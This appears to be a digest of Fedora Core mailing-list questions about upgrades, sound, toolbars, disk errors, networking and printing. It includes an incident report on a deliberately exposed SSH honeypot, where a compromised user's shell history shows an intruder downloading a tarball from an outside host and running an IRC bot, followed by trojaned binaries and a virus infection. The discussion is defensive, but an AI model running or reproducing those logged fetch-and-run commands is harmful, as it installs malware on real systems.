Fedora Core brevity vs server upgrades
by rado
hi y'all
Oh I know some people might say you have no business running servers on
Fedora because the Cores are so short lived and yes, it's not an ideal
position but sometimes you have to just grin and bear it. ...hard to
beat for the money huh?
Well, I would like some views on this, if you just want to say don't run
fc then please just don't respond k? What we have here is a new core
coming out bout every six months and then probably a year and it's in
legacy. This seems to be the pattern. Now then you experienced hands
w/this have seen what happens as soon as it is released from testing. I
have not that much experience there.
I saw remarks by Alexander Dalloz and others whom I respect all greatly.
They seemed to instill in me that just because the core is released does
not mean that there are above avg problems w/it right then. The main
public (not just the testers) get a hold of it and bugzilla gets it's
share of activity. Given all this, when you think is ideal time to
upgrade??? Do it right away...wait a couple months...when???
I don't have a bench test machine anymore...and I have 3 fedora boxes 2
servers synced together backing each others availability, and another
box also running fc3 that mainly holds backups for the 3 fedora boxes
and 2 windows and also will be the box I want to settle in as my pc,
for doing dev. work and what not.
thx for listening

Sound controls
by cas
Hi. I am new to fedora core 3. (previously used mandrake). Everything
installs and appears to run ok except for the sound. I have an internal
via soundcard.
Using gnome xmms comes up with an exception saying that audio cannot be
initialized. Games such as maelstrom and tuxracer have good sound. Xmms
will work if you run it as root but then the games get no sound at all.
Using KDE xmms works fine but sound from the games is laggy and
crackling. This happens whether or not other programs are active.
The soundcard detects and plays the test sound ok. If anyone can provide
advice as to what is causing the problem it would be appreciated.

OO Object Bar - FC2
by Jonathan Allen
Hi All,
I'm having trouble with the Open Office Writer Object bar. I went for
the bullet-list button but clicked something, and the object bar disappeared.
If I click View->Toolbars and click Object Bar, instead of replacing the
object bar at the top of the window, it insists upon opening a new window
with the bar in. I have tried closing and re-opening all the other bars
and they seem to come and go correctly around the document window, but I
can't seem to find anything that will fix the Object Bar. Any ideas ?
FC2, fully up2date; OO 1.1.3, also fully up2date

Ext3-FS error in FC2 and 3
by John Trump
Not sure if this email is actually making it ot the list my apologies
if this shows up several times.
I have two dell 2650's, 3 disk raid 5. Both servers on a frequent
basis gives the following error, only method to get the server back is
to power cycle it. Any suggestions as to what the cause of the error
is:
Ext3-FS error (device:sda2) in start_transaction journal has stopped
According to the raid card the raid5 volume is optimal.

This is ~daikanyama/.bash_history
passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech
There is a complex directory tree under ~daikanyama/.undernet
There are no interesting files under ~kevin.
Kevin had tcsh as login shell. Using ps aux, I have seen that kevin
used ftp, and kevin also used passwd.
One of the users compiled something, I have seen that they utilized
"make". Kevin installed some program psybnc under /var/tmp
There is nothing interesting in /tmp and /root (root has tcsh as
login shell).

ethernet not working
by Michael Hennebry
I had updated from RH9 to FC3.
Some things, a2ps among them, didn't seem right,
so I decided to do a a from-scratch install using
the same disks I used for the update.
Ethernet no longer works. /dev/eth0 isn't even
there. I thought I'd seen a red FAILED message
whiz by with something like ethernet in it.
I'm at a loss. Even if I find the corresponding
log message, I expect it wouldn't tell me how to fix it.
How-tos rarely tell how to fix something after one thinks
he did it right, but it still doesn't work.
Can anyone point me to one that does?

brute force ssh attack
by Daniel Kirsten
Hallo,
there are numerous brute force ssh attacks in the web.
I was quite curious, and for fun, I created the typical
user accounts and set easy to guess passwords....
Yesterday, such a ssh login was successful for users
kevin and daikanyama. The hackers changed the passwords
for both logins. They installed a certain program
"undernet" as daikanyama and started a program called mech.
After some minutes, I removed the network cable, killed
all the processes of the users and disabled these users.
Then, I figured out that some programs as grep did not work.
I rebooted the machine, but during the reboot I got
various "segmentation faults", "illegal instructions", ....
I booted from an FC3 rescue CD, and I found out that
various executables in /bin and /user/bin where
manipulated (grep, egrep, gzip, rpm, mount, ...).
I replaced these manipulated executlables by original
files, but I forgot to replace gtbl.
Then, the machine booted correctly. Later when gtbl
was called, some executables in /bin and /user/bin
where manipulated. It seems to be some virus, when
you start a manipulated executable it manipulates
other executables.
I managed to replace all manipulated files and the
machine seems to work correctly.
My question is: They did not guess the root password,
how did they manipulate files which are only writable
by root???
Is anyone interested in log-files or in the programs
which the hackers installed under daikanyama?
Best regards, Daniel

>Daniel -- did you happen to run any of the commands in the compromised user
>account as root?
Yesterday, I examined the directory ~daikanyama/.undernet and probably I
executed mech as root. The file mech is indeed infected by Linux/Rst-B.
This explains everything.......
Does anyone know whether .undernet/mech has another purpose than
distributing the Linux/Rst-B virus???

blank spaces in system tray
by Neal Wilkinson
What would make blank spaces in the system tray? I have Klipper there
and then a blank space to the right of it equal to the size of another
icon but its blank. Then comes the Red Hat Network Notification tool and
then another blank space equal to the size of another icon to the right
of it. Right clicking on either blank space produces nothing.

Re Re Hp Deskjet 825C and FC3.
by Olle & Susan
Yes, printing does work properly from other apps. (CD-covers are a
little too small, but...)
I did find a workaround, I lie and call my printer an HP Desk jet 840C.
Then the printer
works fine, must reduce the ink volume a little for perfect pictures.
